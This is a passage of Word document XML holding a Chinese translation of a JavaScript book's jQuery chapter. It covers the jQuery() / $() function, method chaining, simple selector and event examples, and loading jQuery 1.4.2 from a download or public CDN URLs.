      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>，第四部分还包括</w:t>
      </w:r>
      <w:r>
        <w:t>jQuer</w:t>
      </w:r>
      <w:r>
        <w:t>y</w:t>
      </w:r>
      <w:r>
        <w:t>的快速参考。在第四部分，</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>方法没有设独立词条，但</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>为每个方法都给出了概要说明。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>能让你在文档中轻松找到关心的元素，并对这些元素进行操作：添加内容、编辑</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>属性和</w:t>
      </w:r>
      <w:r>
        <w:t>CSS</w:t>
      </w:r>
      <w:r>
        <w:t>属性、定义事件处理程序，以及执行动画。它还拥有</w:t>
      </w:r>
      <w:r>
        <w:t>Ajax</w:t>
      </w:r>
      <w:r>
        <w:t>工具来动态发起</w:t>
      </w:r>
      <w:r>
        <w:t>HTTP</w:t>
      </w:r>
      <w:r>
        <w:t>请求，以及一些通用的工具函数来操作对象和数组。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>正如其名，</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>类库聚焦于查询。一个典型查询使用</w:t>
      </w:r>
      <w:r>
        <w:t>CSS</w:t>
      </w:r>
      <w:r>
        <w:t>选择器来识别一组文档元素，并返回一个对象来表示这些元素。返回的对象提供了大量有用的方法来批量操作匹配的元素。这些方法会尽可能</w:t>
      </w:r>
      <w:r>
        <w:t>返回调用对象本身，这使得简洁的链式调用成为可能。</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>如此强大和好用，关键得益于以下特性：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>·</w:t>
      </w:r>
      <w:r>
        <w:t>丰富强大的语法（</w:t>
      </w:r>
      <w:r>
        <w:t>CSS</w:t>
      </w:r>
      <w:r>
        <w:t>选择器），用来查询文档元素</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>·</w:t>
      </w:r>
      <w:r>
        <w:t>高效的查询方法，用来找到与</w:t>
      </w:r>
      <w:r>
        <w:t>CSS</w:t>
      </w:r>
      <w:r>
        <w:t>选择器匹配的文档元素集</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>·</w:t>
      </w:r>
      <w:r>
        <w:t>一套有用的方法，用来操作选中的元素</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>·</w:t>
      </w:r>
      <w:r>
        <w:t>强大的函数式编程技巧，用来批量操作元素集，而不是每次只操作单个</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>·</w:t>
      </w:r>
      <w:r>
        <w:t>简洁的语言用法（链式调用），用来表示一系列顺序操作</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>本章首先会介绍如何使用</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>来实现简单查询并操作其结果。接下来的章节会讲解：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>·</w:t>
      </w:r>
      <w:r>
        <w:t>如何设置</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>属性、</w:t>
      </w:r>
      <w:r>
        <w:t>CSS</w:t>
      </w:r>
      <w:r>
        <w:t>样式和类、</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>表单的值和元素</w:t>
      </w:r>
      <w:r>
        <w:t>内容、位置高宽，以及数据</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>·</w:t>
      </w:r>
      <w:r>
        <w:t>如何改变文档结构：对元素进行插入、替换、包装和删除操作</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>·</w:t>
      </w:r>
      <w:r>
        <w:t>如何使用</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>的跨浏览器事件模型</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>·</w:t>
      </w:r>
      <w:r>
        <w:t>如何用</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>来实现动画视觉效果</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>·jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:t>Ajax</w:t>
      </w:r>
      <w:r>
        <w:t>工具，如何用脚本来发起</w:t>
      </w:r>
      <w:r>
        <w:t>HTTP</w:t>
      </w:r>
      <w:r>
        <w:t>请求</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>·jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>的工具函数</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>·jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>选择器的所有语法，以及如何使用</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>的高级选择方法</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>·</w:t>
      </w:r>
      <w:r>
        <w:t>如何使用和编写插件来对</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>进行扩展</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>·jQuery UI</w:t>
      </w:r>
      <w:r>
        <w:t>类库</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:bookmarkStart w:id="462" w:name="19_1_jQueryJi_Chu_"/>
      <w:r>
        <w:t>19.1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>基础</w:t>
      </w:r>
      <w:bookmarkEnd w:id="462"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>类库定义了一个全局函数：</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery()</w:t>
      </w:r>
      <w:r>
        <w:t>。该函数使用频繁，因此在类库中还给它定义了一个快捷别名：</w:t>
      </w:r>
      <w:r>
        <w:t>$</w:t>
      </w:r>
      <w:r>
        <w:t>。这是</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>在全局命名空间中定义的唯一两个变量</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="1Text"/>
        </w:rPr>
        <w:t>[2]</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>这个拥有两个名字的全局方法是</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>的核心查询方法。例如，下面的代码能获取文档中的所有＜</w:t>
      </w:r>
      <w:r>
        <w:t>div</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var divs=$("div");</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>该方法返回的值表示零个或多个</w:t>
      </w:r>
      <w:r>
        <w:t>DOM</w:t>
      </w:r>
      <w:r>
        <w:t>元素，这就是</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>对象。注意：</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery()</w:t>
      </w:r>
      <w:r>
        <w:t>是工厂函数，不是构造函数，它返回一个新创建的对象，但并没有和</w:t>
      </w:r>
      <w:r>
        <w:t>new</w:t>
      </w:r>
      <w:r>
        <w:t>关键字一起使用。</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>对象定义了</w:t>
      </w:r>
      <w:r>
        <w:t>很多方法，可以用来操作它们表示的这组元素，本章中的大部分文字将用来阐释这些方法。例如，下面这段代码可以用来找到所有拥有</w:t>
      </w:r>
      <w:r>
        <w:t>details</w:t>
      </w:r>
      <w:r>
        <w:t>类的</w:t>
      </w:r>
      <w:r>
        <w:t>p</w:t>
      </w:r>
      <w:r>
        <w:t>元素，将其高亮显示，并将其中隐藏的</w:t>
      </w:r>
      <w:r>
        <w:t>p</w:t>
      </w:r>
      <w:r>
        <w:t>元素快速显示出来：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>$("p.details").css("background-color","yellow").show("fast");</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>上面的</w:t>
      </w:r>
      <w:r>
        <w:t>css()</w:t>
      </w:r>
      <w:r>
        <w:t>方法操作的</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>对象是由</w:t>
      </w:r>
      <w:r>
        <w:t>$()</w:t>
      </w:r>
      <w:r>
        <w:t>返回的，</w:t>
      </w:r>
      <w:r>
        <w:t>css()</w:t>
      </w:r>
      <w:r>
        <w:t>方法返回的也是这个对象，因此可以继续调用</w:t>
      </w:r>
      <w:r>
        <w:t>show()</w:t>
      </w:r>
      <w:r>
        <w:t>方法，这就是链式调用，很简洁紧凑。在</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>编程中，链式调用这个</w:t>
      </w:r>
      <w:r>
        <w:t>习惯用语很普遍。再举个例子，下面的代码可以找到文档中拥有</w:t>
      </w:r>
      <w:r>
        <w:t>"clicktohide"CSS</w:t>
      </w:r>
      <w:r>
        <w:t>类的所有元素，并给每一个元素都注册一个事件处理函数。当用户单击元素时，会调用事件处理程序，使得该元素缓慢向上收缩，最终消失：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>$(".clicktohide").click(function(){$(this).slideUp("slow");});</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para07"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>获取</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para05"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>类库是免费软件，可以从</w:t>
      </w:r>
      <w:r>
        <w:t>http://jquery.com</w:t>
      </w:r>
      <w:r>
        <w:t>下载该软件。下载后，像下面这样通过＜</w:t>
      </w:r>
      <w:r>
        <w:t>script</w:t>
      </w:r>
      <w:r>
        <w:t>＞元素在</w:t>
      </w:r>
      <w:r>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:t>页面中引入：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>s</w:t>
      </w:r>
      <w:r>
        <w:t>cript src="jquery-1.4.2.min.js"</w:t>
      </w:r>
      <w:r>
        <w:t>＞＜</w:t>
      </w:r>
      <w:r>
        <w:t>/script</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para05"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>文件名中的</w:t>
      </w:r>
      <w:r>
        <w:t>"min"</w:t>
      </w:r>
      <w:r>
        <w:t>表示引入的是压缩版本的类库，已经去除不必要的注释和空格，变量名等内部标识符也替换成了更短的名字。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para05"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>在</w:t>
      </w:r>
      <w:r>
        <w:t>Web</w:t>
      </w:r>
      <w:r>
        <w:t>应用中引入</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>的另一个方式是使用内容分发网络，比如以下</w:t>
      </w:r>
      <w:r>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:t>地址：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>http://code.jquery.com/jquery-1.4.2.min.js</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>http://ajax.microsoft.com/ajax/jquery/jquery-1.4.2.min.js</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para05"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>本章讲述的是</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery 1.4</w:t>
      </w:r>
      <w:r>
        <w:t>版本。如果使用的是其他版本，在必要时请替换上面</w:t>
      </w:r>
      <w:r>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:t>中的版本号</w:t>
      </w:r>
      <w:r>
        <w:t>“1.4.2”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="1Text"/>
        </w:rPr>
        <w:t>[3]</w:t>
      </w:r>
      <w:r>
        <w:t>。如果使用</w:t>
      </w:r>
      <w:r>
        <w:t>Google CDN</w:t>
      </w:r>
      <w:r>
        <w:t>，可以用</w:t>
      </w:r>
      <w:r>
        <w:t>“1.4”</w:t>
      </w:r>
      <w:r>
        <w:t>来获取</w:t>
      </w:r>
      <w:r>
        <w:t>1.4.x</w:t>
      </w:r>
      <w:r>
        <w:t>系列中的最新版本，或者用</w:t>
      </w:r>
      <w:r>
        <w:t>“1”</w:t>
      </w:r>
      <w:r>
        <w:t>来获取版本号小于</w:t>
      </w:r>
      <w:r>
        <w:t>“2.0”</w:t>
      </w:r>
      <w:r>
        <w:t>的最新版本。通过上面这些众所周知的</w:t>
      </w:r>
      <w:r>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:t>来加载</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>的最大好处是，因为</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>很流行，访问你的网站的用户，</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>很有可能在访问其他网站时，已经下</w:t>
      </w:r>
      <w:r>
        <w:t>载过</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>类库，保存在浏览器缓存中，无须重新下载了。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:spacing w:before="319" w:after="319"/>
      </w:pPr>
      <w:bookmarkStart w:id="463" w:name="19_1_1_jQuery__Han_Shu_"/>
      <w:r>
        <w:t>19.1.1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery()</w:t>
      </w:r>
      <w:r>
        <w:t>函数</w:t>
      </w:r>
      <w:bookmarkEnd w:id="463"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>在</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>类库中，最重要的方法是</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery()</w:t>
      </w:r>
      <w:r>
        <w:t>方法（也就是</w:t>
      </w:r>
      <w:r>
        <w:t>$()</w:t>
      </w:r>
      <w:r>
        <w:t>）。它的功能很强大，有</w:t>
      </w:r>
      <w:r>
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:t>种不同的调用方式。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>第一种也是最常用的调用方式是传递</w:t>
      </w:r>
      <w:r>
        <w:t>CSS</w:t>
      </w:r>
      <w:r>
        <w:t>选择器（字符串）给</w:t>
      </w:r>
      <w:r>
        <w:t>$()</w:t>
      </w:r>
      <w:r>
        <w:t>方法。当通过这种方式调用时，</w:t>
      </w:r>
      <w:r>
        <w:t>$()</w:t>
      </w:r>
      <w:r>
        <w:t>方法会返回当前文档中匹配该选择器的元素集。</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>支持大部分</w:t>
      </w:r>
      <w:r>
        <w:t>CSS3</w:t>
      </w:r>
      <w:r>
        <w:t>选择器语法，还支持一些自己的扩展语法。</w:t>
      </w:r>
      <w:r>
        <w:t>19.8.1</w:t>
      </w:r>
      <w:r>
        <w:t>节将详细阐述</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>选择器语法。还可以将一个元素或</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>对象作为第二参数传</w:t>
      </w:r>
      <w:r>
        <w:t>递给</w:t>
      </w:r>
      <w:r>
        <w:t>$()</w:t>
      </w:r>
      <w:r>
        <w:t>方法，这时返回的是该特定元素或元素集的子元素中匹配选择器的部分。这第二参数是可选的，定义了元素查询的起始点，经常称为上下文（</w:t>
      </w:r>
      <w:r>
        <w:t>context</w:t>
      </w:r>
      <w:r>
        <w:t>）。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>第二种调用方式是传递一个</w:t>
      </w:r>
      <w:r>
        <w:t>Element</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>Document</w:t>
      </w:r>
      <w:r>
        <w:t>或</w:t>
      </w:r>
      <w:r>
        <w:t>Window</w:t>
      </w:r>
      <w:r>
        <w:t>对象给</w:t>
      </w:r>
      <w:r>
        <w:t>$()</w:t>
      </w:r>
      <w:r>
        <w:t>方法。在这种情况下，</w:t>
      </w:r>
      <w:r>
        <w:t>$()</w:t>
      </w:r>
      <w:r>
        <w:t>方法只须简单地将该</w:t>
      </w:r>
      <w:r>
        <w:t>Element</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>Document</w:t>
      </w:r>
      <w:r>
        <w:t>或</w:t>
      </w:r>
      <w:r>
        <w:t>Window</w:t>
      </w:r>
      <w:r>
        <w:t>对象封装成</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>对象并返回。这样可以使得能用</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>方法来操作这些元素而不用使用原生</w:t>
      </w:r>
      <w:r>
        <w:t>DOM</w:t>
      </w:r>
      <w:r>
        <w:t>方法。例如，在</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>程序中，经常可以看见</w:t>
      </w:r>
      <w:r>
        <w:t>$(document)</w:t>
      </w:r>
      <w:r>
        <w:t>或</w:t>
      </w:r>
      <w:r>
        <w:t>$(this)</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>对象可以</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>表示文档中的多个元素，也可以传递一个元素数组给</w:t>
      </w:r>
      <w:r>
        <w:t>$()</w:t>
      </w:r>
      <w:r>
        <w:t>方法。在这种情况下，返回的</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>对象表示该数组中的元素集。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>第三种调用方式是传递</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>文本字符串给</w:t>
      </w:r>
      <w:r>
        <w:t>$()</w:t>
      </w:r>
      <w:r>
        <w:t>方法。在这种调用方式下，</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>会根据传入的文本创建好</w:t>
      </w:r>
      <w:r>
        <w:t>HTML</w:t>
      </w:r>
      <w:r>
        <w:t>元素并封装为</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>对象返回。</w:t>
      </w:r>
      <w:r>
        <w:t>jQuery</w:t>
      </w:r>
      <w:r>
        <w:t>不会将刚创建的元素自动插入文档中，可以使用</w:t>
      </w:r>
      <w:r>
